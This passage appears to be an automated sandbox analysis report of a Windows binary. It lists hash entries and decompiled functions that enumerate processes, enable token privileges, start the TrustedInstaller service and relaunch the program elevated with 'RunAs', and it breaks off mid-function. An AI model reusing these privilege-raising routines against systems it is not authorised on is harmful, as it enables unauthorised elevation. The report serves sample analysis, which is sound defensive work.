                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.288245534.0000000000A20000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 037ebc7b878ed5b970d4d136eab1a746635d2f51cd3a1d51efbb1cfcc9f03c91
                                                                                      • Instruction ID: afb9f0d61bd3df64b8b795e60e96d2a0d6de80cdedc48232169090920c2edfa9
                                                                                      • Opcode Fuzzy Hash: 037ebc7b878ed5b970d4d136eab1a746635d2f51cd3a1d51efbb1cfcc9f03c91
                                                                                      • Instruction Fuzzy Hash: 46D0123000D79C9FC7029F65A9945953F64DD5250430541C6D45D8F043D164AA1DC717
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.288245534.0000000000A20000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e18c00149985d15706cd7b10a49240ee00d52c47f3d4c2254d42374cc93a76c8
                                                                                      • Instruction ID: 65b2cfb9996257e9e7cdfc82c5175e4898385a5729ecc36f8caa75b3f182d99d
                                                                                      • Opcode Fuzzy Hash: e18c00149985d15706cd7b10a49240ee00d52c47f3d4c2254d42374cc93a76c8
                                                                                      • Instruction Fuzzy Hash: 05C012300046095B8680FB60F84945D336B9781159741CC2091086F46EDF7D55494785
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.288245534.0000000000A20000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 24de544af1a3dc1cddaf4cc8e269d59eb01934176791be26a1a89ef43cb4a864
                                                                                      • Instruction ID: a027b7eceae3b914b2fd15ed8129828d589655ac660982d2012219c07cda6a03
                                                                                      • Opcode Fuzzy Hash: 24de544af1a3dc1cddaf4cc8e269d59eb01934176791be26a1a89ef43cb4a864
                                                                                      • Instruction Fuzzy Hash: 45C0121090E2C08FCB1387208C6A5093F728B42384B2A84CAE0C1CB5B7D8388815D3A3
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.288245534.0000000000A20000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9810cddfc676983726c931c37db9e4a02ac6a888fd5fed6bce01954839822aed
                                                                                      • Instruction ID: a76bdf4d44aa03de1118bfcde555a8072ebef36d7ebf6e40cb1733c66be459f9
                                                                                      • Opcode Fuzzy Hash: 9810cddfc676983726c931c37db9e4a02ac6a888fd5fed6bce01954839822aed
                                                                                      • Instruction Fuzzy Hash: B5C04C3A740015CFCB04DF58F444CD87770EB8926A70100A6E6099B231D731ED55CF80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.288245534.0000000000A20000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d69ad1ff7cc10fdc91570120cb95c85e86a4cbebdeb684f3e51129225c8ca5a5
                                                                                      • Instruction ID: 76ca5f68f0bce338c87a42143ee012eb9cc80a0dc0d8cea669746600956e99ba
                                                                                      • Opcode Fuzzy Hash: d69ad1ff7cc10fdc91570120cb95c85e86a4cbebdeb684f3e51129225c8ca5a5
                                                                                      • Instruction Fuzzy Hash: EF90023104471C8B554027967509555775DD5445297800051A61D455025AA969104996
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Non-executed Functions

                                                                                      Executed Functions

                                                                                      C-Code - Quality: 93%
                                                                                      			E004095FD(void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                      				void* _v8;
                                                                                      				void* _v12;
                                                                                      				char _v16;
                                                                                      				char _v24;
                                                                                      				char _v32;
                                                                                      				char _v40;
                                                                                      				char _v48;
                                                                                      				intOrPtr _v52;
                                                                                      				char _v576;
                                                                                      				long _v580;
                                                                                      				intOrPtr _v1112;
                                                                                      				long _v1128;
                                                                                      				void _v1132;
                                                                                      				void* _v1136;
                                                                                      				void _v1658;
                                                                                      				char _v1660;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				void* _t41;
                                                                                      				long _t49;
                                                                                      				void* _t50;
                                                                                      				intOrPtr* _t66;
                                                                                      				struct HINSTANCE__* _t68;
                                                                                      				void* _t71;
                                                                                      				void* _t83;
                                                                                      				void* _t84;
                                                                                      				void* _t85;
                                                                                      
                                                                                      				_t78 = _a4;
                                                                                      				E004099D4(_a4 + 0x28);
                                                                                      				_t41 = CreateToolhelp32Snapshot(2, 0); // executed
                                                                                      				_v12 = _t41;
                                                                                      				memset( &_v1132, 0, 0x228);
                                                                                      				_t84 = _t83 + 0xc;
                                                                                      				_v1136 = 0x22c;
                                                                                      				Process32FirstW(_v12,  &_v1136); // executed
                                                                                      				while(Process32NextW(_v12,  &_v1136) != 0) {
                                                                                      					E004090AF( &_v580);
                                                                                      					_t49 = _v1128;
                                                                                      					_v580 = _t49;
                                                                                      					_v52 = _v1112;
                                                                                      					_t50 = OpenProcess(0x410, 0, _t49);
                                                                                      					_v8 = _t50;
                                                                                      					if(_t50 != 0) {
                                                                                      						L4:
                                                                                      						_v1660 = 0;
                                                                                      						memset( &_v1658, 0, 0x208);
                                                                                      						_t85 = _t84 + 0xc;
                                                                                      						E004098F9(_t78, _v8,  &_v1660);
                                                                                      						if(_v1660 != 0) {
                                                                                      							L10:
                                                                                      							E0040920A( &_v576,  &_v1660);
                                                                                      							E00409555(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
                                                                                      							_t84 = _t85 + 0x14;
                                                                                      							CloseHandle(_v8);
                                                                                      							_t78 = _a4;
                                                                                      							L11:
                                                                                      							E004099ED(_t78 + 0x28,  &_v580);
                                                                                      							continue;
                                                                                      						}
                                                                                      						_v16 = 0x104;
                                                                                      						if( *0x41c8e0 == 0) {
                                                                                      							_t68 = GetModuleHandleW(L"kernel32.dll");
                                                                                      							if(_t68 != 0) {
                                                                                      								 *0x41c8e0 = 1;
                                                                                      								 *0x41c8e4 = GetProcAddress(_t68, "QueryFullProcessImageNameW");
                                                                                      							}
                                                                                      						}
                                                                                      						_t66 =  *0x41c8e4;
                                                                                      						if(_t66 != 0) {
                                                                                      							 *_t66(_v8, 0,  &_v1660,  &_v16); // executed
                                                                                      						}
                                                                                      						goto L10;
                                                                                      					}
                                                                                      					if( *((intOrPtr*)(E00404BAF() + 4)) <= 5) {
                                                                                      						goto L11;
                                                                                      					}
                                                                                      					_t71 = OpenProcess(0x1000, 0, _v580);
                                                                                      					_v8 = _t71;
                                                                                      					if(_t71 == 0) {
                                                                                      						goto L11;
                                                                                      					}
                                                                                      					goto L4;
                                                                                      				}
                                                                                      				return CloseHandle(_v12);
                                                                                      			}

                                                                                      APIs
                                                                                        • Part of subcall function 004099D4: free.MSVCRT(00000000,00409614,?,?,00000000), ref: 004099DB
                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
                                                                                      • memset.MSVCRT ref: 0040962E
                                                                                      • Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                      • OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 00409681
                                                                                      • OpenProcess.KERNEL32(00001000,00000000,?), ref: 004096A5
                                                                                      • memset.MSVCRT ref: 004096C6
                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 004096FC
                                                                                      • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00409716
                                                                                      • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00409739
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 0040976A
                                                                                      • Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                      • CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
                                                                                      • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 75%
                                                                                      			E00401C26(long _a4) {
                                                                                      				struct _SHELLEXECUTEINFOW _v68;
                                                                                      				void _v582;
                                                                                      				char _v584;
                                                                                      				void _v1110;
                                                                                      				char _v1112;
                                                                                      				long _t23;
                                                                                      				int _t36;
                                                                                      				int _t41;
                                                                                      				void* _t43;
                                                                                      				long _t44;
                                                                                      
                                                                                      				_t44 = 0;
                                                                                      				_t23 = GetCurrentProcessId();
                                                                                      				_v584 = 0;
                                                                                      				memset( &_v582, 0, 0x1fe);
                                                                                      				_v1112 = 0;
                                                                                      				memset( &_v1110, 0, 0x208);
                                                                                      				E00404AD9( &_v1112);
                                                                                      				_push(_t23);
                                                                                      				_push(0);
                                                                                      				_push(_a4);
                                                                                      				_push(L"/SpecialRun %I64x %d");
                                                                                      				_push(0xff);
                                                                                      				_push( &_v584);
                                                                                      				L0040B1EC();
                                                                                      				memset( &(_v68.fMask), 0, 0x38);
                                                                                      				_v68.lpFile =  &_v1112;
                                                                                      				_v68.lpParameters =  &_v584;
                                                                                      				_v68.cbSize = 0x3c;
                                                                                      				_v68.lpVerb = L"RunAs";
                                                                                      				_v68.fMask = 0x40;
                                                                                      				_v68.nShow = 5;
                                                                                      				_t36 = ShellExecuteExW( &_v68); // executed
                                                                                      				_t43 = _v68.hProcess;
                                                                                      				if(_t36 == 0) {
                                                                                      					_t44 = GetLastError();
                                                                                      				} else {
                                                                                      					WaitForSingleObject(_t43, 0x5dc);
                                                                                      					_a4 = 0;
                                                                                      					_t41 = GetExitCodeProcess(_t43,  &_a4); // executed
                                                                                      					if(_t41 != 0 && _a4 != 0x103) {
                                                                                      						_t44 = _a4;
                                                                                      					}
                                                                                      				}
                                                                                      				return _t44;
                                                                                      			}

                                                                                      APIs
                                                                                      • GetCurrentProcessId.KERNEL32(004101D8,?), ref: 00401C33
                                                                                      • memset.MSVCRT ref: 00401C4F
                                                                                      • memset.MSVCRT ref: 00401C68
                                                                                        • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                      • _snwprintf.MSVCRT ref: 00401C8F
                                                                                      • memset.MSVCRT ref: 00401C9B
                                                                                      • ShellExecuteExW.SHELL32(?), ref: 00401CD5
                                                                                      • WaitForSingleObject.KERNEL32(?,000005DC), ref: 00401CE8
                                                                                      • GetExitCodeProcess.KERNELBASE ref: 00401CF6
                                                                                      • GetLastError.KERNEL32 ref: 00401D0E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: memset$Process$CodeCurrentErrorExecuteExitFileLastModuleNameObjectShellSingleWait_snwprintf
                                                                                      • String ID: /SpecialRun %I64x %d$<$@$RunAs
                                                                                      • API String ID: 903100921-3385179869
                                                                                      • Opcode ID: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                      • Instruction ID: 2715f163b7cd274c39606e2610d12bc00880993b2534c3bb77a56ee1366ffd0d
                                                                                      • Opcode Fuzzy Hash: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                      • Instruction Fuzzy Hash: FD216D71900118FBDB20DB91CD48ADF7BBCEF44744F004176F608B6291D778AA84CBA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00408FC9(struct HINSTANCE__** __eax, void* __eflags, WCHAR* _a4) {
                                                                                      				void* _v8;
                                                                                      				intOrPtr _v12;
                                                                                      				struct _TOKEN_PRIVILEGES _v24;
                                                                                      				void* __esi;
                                                                                      				_Unknown_base(*)()* _t16;
                                                                                      				_Unknown_base(*)()* _t18;
                                                                                      				long _t19;
                                                                                      				_Unknown_base(*)()* _t22;
                                                                                      				_Unknown_base(*)()* _t24;
                                                                                      				struct HINSTANCE__** _t35;
                                                                                      				void* _t37;
                                                                                      
                                                                                      				_t37 = __eflags;
                                                                                      				_t35 = __eax;
                                                                                      				if(E00408F92(_t35, _t37, GetCurrentProcess(), 0x28,  &_v8) == 0) {
                                                                                      					return GetLastError();
                                                                                      				}
                                                                                      				_t16 = E00408F72(_t35);
                                                                                      				__eflags = _t16;
                                                                                      				if(_t16 != 0) {
                                                                                      					_t24 = GetProcAddress( *_t35, "LookupPrivilegeValueW");
                                                                                      					__eflags = _t24;
                                                                                      					if(_t24 != 0) {
                                                                                      						LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
                                                                                      					}
                                                                                      				}
                                                                                      				_v24.PrivilegeCount = 1;
                                                                                      				_v12 = 2;
                                                                                      				_a4 = _v8;
                                                                                      				_t18 = E00408F72(_t35);
                                                                                      				__eflags = _t18;
                                                                                      				if(_t18 != 0) {
                                                                                      					_t22 = GetProcAddress( *_t35, "AdjustTokenPrivileges");
                                                                                      					__eflags = _t22;
                                                                                      					if(_t22 != 0) {
                                                                                      						AdjustTokenPrivileges(_a4, 0,  &_v24, 0, 0, 0); // executed
                                                                                      					}
                                                                                      				}
                                                                                      				_t19 = GetLastError();
                                                                                      				FindCloseChangeNotification(_v8); // executed
                                                                                      				return _t19;
                                                                                      			}

                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                        • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                      • GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                      • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueW), ref: 0040900C
                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040901A
                                                                                      • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 00409040
                                                                                      • AdjustTokenPrivileges.KERNELBASE(00000002,00000000,00000001,00000000,00000000,00000000), ref: 00409051
                                                                                      • GetLastError.KERNEL32(00000000,00000000,00000000), ref: 00409053
                                                                                      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040905E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: AddressProc$ErrorLast$AdjustChangeCloseCurrentFindLookupNotificationPrivilegePrivilegesProcessTokenValue
                                                                                      • String ID: AdjustTokenPrivileges$LookupPrivilegeValueW
                                                                                      • API String ID: 616250965-1253513912
                                                                                      • Opcode ID: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                      • Instruction ID: 03a5dc6c67e2a3af6dad2eaf9b7d3d3c38ee31464385454108c093b6d6cde588
                                                                                      • Opcode Fuzzy Hash: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                      • Instruction Fuzzy Hash: 34114F72500105FFEB10AFF4DD859AF76ADAB44384B10413AF541F2192DA789E449B68
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00401306(void* _a4) {
                                                                                      				intOrPtr _v28;
                                                                                      				struct _SERVICE_STATUS _v32;
                                                                                      				void* _t5;
                                                                                      				int _t12;
                                                                                      				void* _t14;
                                                                                      
                                                                                      				_t12 = 0; // executed
                                                                                      				_t5 = OpenServiceW(_a4, L"TrustedInstaller", 0x34); // executed
                                                                                      				_t14 = _t5;
                                                                                      				if(_t14 != 0) {
                                                                                      					if(QueryServiceStatus(_t14,  &_v32) != 0 && _v28 != 4) {
                                                                                      						_t12 = StartServiceW(_t14, 0, 0);
                                                                                      					}
                                                                                      					CloseServiceHandle(_t14);
                                                                                      				}
                                                                                      				CloseServiceHandle(_a4);
                                                                                      				return _t12;
                                                                                      			}

                                                                                      APIs
                                                                                      • OpenServiceW.ADVAPI32(00402183,TrustedInstaller,00000034,?,?,00000000,?,?,?,?,?,00402183,00000000), ref: 0040131B
                                                                                      • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00402183,00000000), ref: 00401332
                                                                                      • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00401345
                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00402183,00000000), ref: 0040134E
                                                                                      • CloseServiceHandle.ADVAPI32(00402183,?,?,?,?,?,00402183,00000000), ref: 00401353
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: Service$CloseHandle$OpenQueryStartStatus
                                                                                      • String ID: TrustedInstaller
                                                                                      • API String ID: 862991418-565535830
                                                                                      • Opcode ID: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                      • Instruction ID: 300c39592a487ff017dde1f9aaf4b69bffecac74e3568357a1b40912e0f2caec
                                                                                      • Opcode Fuzzy Hash: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                      • Instruction Fuzzy Hash: F9F08275601218FBE7222BE59CC8DAF7A6CDF88794B040132FD01B12A0D674DD05C9F9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E0040A33B(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
                                                                                      				struct HRSRC__* _t12;
                                                                                      				void* _t16;
                                                                                      				void* _t17;
                                                                                      				signed int _t18;
                                                                                      				signed int _t26;
                                                                                      				signed int _t29;
                                                                                      				signed int _t33;
                                                                                      				struct HRSRC__* _t35;
                                                                                      				signed int _t36;
                                                                                      
                                                                                      				_t12 = FindResourceW(_a4, _a12, _a8); // executed
                                                                                      				_t35 = _t12;
                                                                                      				if(_t35 != 0) {
                                                                                      					_t33 = SizeofResource(_a4, _t35);
                                                                                      					if(_t33 > 0) {
                                                                                      						_t16 = LoadResource(_a4, _t35);
                                                                                      						if(_t16 != 0) {
                                                                                      							_t17 = LockResource(_t16);
                                                                                      							if(_t17 != 0) {
                                                                                      								_a4 = _t33;
                                                                                      								_t29 = _t33 * _t33;
                                                                                      								_t36 = 0;
                                                                                      								_t7 =  &_a4;
                                                                                      								 *_t7 = _a4 >> 2;
                                                                                      								if( *_t7 != 0) {
                                                                                      									do {
                                                                                      										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
                                                                                      										_t36 = _t36 + 1;
                                                                                      										_t29 = _t26;
                                                                                      									} while (_t36 < _a4);
                                                                                      								}
                                                                                      								_t18 =  *0x40fa70; // 0xfcb617dc
                                                                                      								 *0x40fa70 = _t18 + _t29 ^ _t33;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      				return 1;
                                                                                      			}













                                                                                      APIs
                                                                                      • FindResourceW.KERNELBASE(?,?,?), ref: 0040A348
                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 0040A359
                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 0040A369
                                                                                      • LockResource.KERNEL32(00000000), ref: 0040A374
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                      • String ID:
                                                                                      • API String ID: 3473537107-0
                                                                                      • Opcode ID: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                      • Instruction ID: cffa73b79ff672a66ed03b266e9253c2cf49bd0e4e2f0a3a12bdb4b298abf715
                                                                                      • Opcode Fuzzy Hash: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                      • Instruction Fuzzy Hash: 1101C032700315ABCB194FA5DD8995BBFAEFB852913088036ED09EA2A1D730C811CA88
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 83%
                                                                                      			E004022D5(void* __ecx, void* __edx, void* __eflags, long _a4, long _a8) {
                                                                                      				WCHAR* _v8;
                                                                                      				signed int _v12;
                                                                                      				int _v16;
                                                                                      				int _v20;
                                                                                      				char* _v24;
                                                                                      				int _v28;
                                                                                      				intOrPtr _v32;
                                                                                      				int _v36;
                                                                                      				int _v40;
                                                                                      				char _v44;
                                                                                      				void* _v56;
                                                                                      				int _v60;
                                                                                      				char _v92;
                                                                                      				void _v122;
                                                                                      				int _v124;
                                                                                      				short _v148;
                                                                                      				signed int _v152;
                                                                                      				intOrPtr _v168;
                                                                                      				intOrPtr _v172;
                                                                                      				intOrPtr _v176;
                                                                                      				intOrPtr _v180;
                                                                                      				void _v192;
                                                                                      				char _v196;
                                                                                      				char _v228;
                                                                                      				void _v258;
                                                                                      				int _v260;
                                                                                      				void _v786;
                                                                                      				short _v788;
                                                                                      				void _v1314;
                                                                                      				short _v1316;
                                                                                      				void _v1842;
                                                                                      				short _v1844;
                                                                                      				void _v18234;
                                                                                      				short _v18236;
                                                                                      				char _v83772;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				short* _t174;
                                                                                      				short _t175;
                                                                                      				signed int _t176;
                                                                                      				short _t177;
                                                                                      				short _t178;
                                                                                      				int _t184;
                                                                                      				signed int _t187;
                                                                                      				intOrPtr _t207;
                                                                                      				intOrPtr _t219;
                                                                                      				int* _t252;
                                                                                      				int* _t253;
                                                                                      				int* _t266;
                                                                                      				int* _t267;
                                                                                      				wchar_t* _t270;
                                                                                      				int _t286;
                                                                                      				void* _t292;
                                                                                      				void* _t304;
                                                                                      				WCHAR* _t308;
                                                                                      				WCHAR* _t310;
                                                                                      				intOrPtr* _t311;
                                                                                      				int _t312;
                                                                                      				WCHAR* _t315;
                                                                                      				void* _t325;
                                                                                      				void* _t328;
                                                                                      
                                                                                      				_t304 = __edx;
                                                                                      				E0040B550(0x1473c, __ecx);
                                                                                      				_t286 = 0;
                                                                                      				 *_a4 = 0;
                                                                                      				_v12 = 0;
                                                                                      				_v16 = 0;
                                                                                      				_v20 = 0;
                                                                                      				memset( &_v192, 0, 0x40);
                                                                                      				_v60 = 0;
                                                                                      				asm("stosd");
                                                                                      				asm("stosd");
                                                                                      				asm("stosd");
                                                                                      				_v24 = 0;
                                                                                      				_v40 = 0;
                                                                                      				_v28 = 0;
                                                                                      				_v36 = 0;
                                                                                      				_v32 = 0x100;
                                                                                      				_v44 = 0;
                                                                                      				_v1316 = 0;
                                                                                      				memset( &_v1314, 0, 0x208);
                                                                                      				_v788 = 0;
                                                                                      				memset( &_v786, 0, 0x208);
                                                                                      				_t315 = _a8;
                                                                                      				_t328 = _t325 + 0x24;
                                                                                      				_v83772 = 0;
                                                                                      				_v196 = 0x44;
                                                                                      				E00404923(0x104,  &_v788, _t315);
                                                                                      				if(wcschr(_t315, 0x25) != 0) {
                                                                                      					ExpandEnvironmentStringsW(_t315,  &_v788, 0x104);
                                                                                      				}
                                                                                      				if(_t315[0x2668] != _t286 && wcschr( &_v788, 0x5c) == 0) {
                                                                                      					_v8 = _t286;
                                                                                      					_v1844 = _t286;
                                                                                      					memset( &_v1842, _t286, 0x208);
                                                                                      					_t328 = _t328 + 0xc;
                                                                                      					SearchPathW(_t286,  &_v788, _t286, 0x104,  &_v1844,  &_v8);
                                                                                      					if(_v1844 != _t286) {
                                                                                      						E00404923(0x104,  &_v788,  &_v1844);
                                                                                      					}
                                                                                      				}
                                                                                      				_t308 =  &(_t315[0x2106]);
                                                                                      				if( *_t308 == _t286) {
                                                                                      					E00404B5C( &_v1316,  &_v788);
                                                                                      					__eflags = _v1316 - _t286;
                                                                                      					_t315 = _a8;
                                                                                      					_pop(_t292);
                                                                                      					if(_v1316 == _t286) {
                                                                                      						goto L11;
                                                                                      					}
                                                                                      					goto L10;
                                                                                      				} else {
                                                                                      					_v20 = _t308;
                                                                                      					_t270 = wcschr(_t308, 0x25);
                                                                                      					_pop(_t292);
                                                                                      					if(_t270 == 0) {
                                                                                      						L11:
                                                                                      						_t174 =  &(_t315[0x220e]);
                                                                                      						if( *_t174 != 1) {
                                                                                      							_v152 = _v152 | 0x00000001;
                                                                                      							_v148 =  *_t174;
                                                                                      						}
                                                                                      						_t309 = ",";
                                                                                      						if(_t315[0x2210] != _t286 && _t315[0x2212] != _t286) {
                                                                                      							_v260 = _t286;
                                                                                      							memset( &_v258, _t286, 0x3e);
                                                                                      							_v124 = _t286;
                                                                                      							memset( &_v122, _t286, 0x3e);
                                                                                      							_v8 = _t286;
                                                                                      							E004052F3( &(_t315[0x2212]), _t292,  &_v260, 0x1f,  &_v8, ",");
                                                                                      							E004052F3( &(_t315[0x2212]), _t292,  &_v124, 0x1f,  &_v8, ",");
                                                                                      							_v152 = _v152 | 0x00000004;
                                                                                      							_t266 =  &_v260;
                                                                                      							_push(_t266);
                                                                                      							L0040B1F8();
                                                                                      							_v180 = _t266;
                                                                                      							_t328 = _t328 + 0x3c;
                                                                                      							_t267 =  &_v124;
                                                                                      							L0040B1F8();
                                                                                      							_t292 = _t267;
                                                                                      							_v176 = _t267;
                                                                                      						}
                                                                                      						if(_t315[0x2232] != _t286 && _t315[0x2234] != _t286) {
                                                                                      							_v260 = _t286;
                                                                                      							memset( &_v258, _t286, 0x3e);
                                                                                      							_v124 = _t286;
                                                                                      							memset( &_v122, _t286, 0x3e);
                                                                                      							_v8 = _t286;
                                                                                      							E004052F3( &(_t315[0x2234]), _t292,  &_v260, 0x1f,  &_v8, _t309);
                                                                                      							E004052F3( &(_t315[0x2234]), _t292,  &_v124, 0x1f,  &_v8, _t309);
                                                                                      							_v152 = _v152 | 0x00000002;
                                                                                      							_t252 =  &_v260;
                                                                                      							_push(_t252);
                                                                                      							L0040B1F8();
                                                                                      							_v172 = _t252;
                                                                                      							_t328 = _t328 + 0x3c;
                                                                                      							_t253 =  &_v124;
                                                                                      							_push(_t253);
                                                                                      							L0040B1F8();
                                                                                      							_v168 = _t253;
                                                                                      						}
                                                                                      						_t310 =  &(_t315[0x105]);
                                                                                      						if( *_t310 != _t286) {
                                                                                      							if(_t315[0x266a] == _t286 || wcschr(_t310, 0x25) == 0) {
                                                                                      								_push(_t310);
                                                                                      							} else {
                                                                                      								_v18236 = _t286;
                                                                                      								memset( &_v18234, _t286, 0x4000);
                                                                                      								_t328 = _t328 + 0xc;
                                                                                      								ExpandEnvironmentStringsW(_t310,  &_v18236, 0x2000);
                                                                                      								_push( &_v18236);
                                                                                      							}
                                                                                      							_push( &_v788);
                                                                                      							_push(L"\"%s\" %s");
                                                                                      							_push(0x7fff);
                                                                                      							_push( &_v83772);
                                                                                      							L0040B1EC();
                                                                                      							_v24 =  &_v83772;
                                                                                      						}
                                                                                      						_t175 = _t315[0x220c];
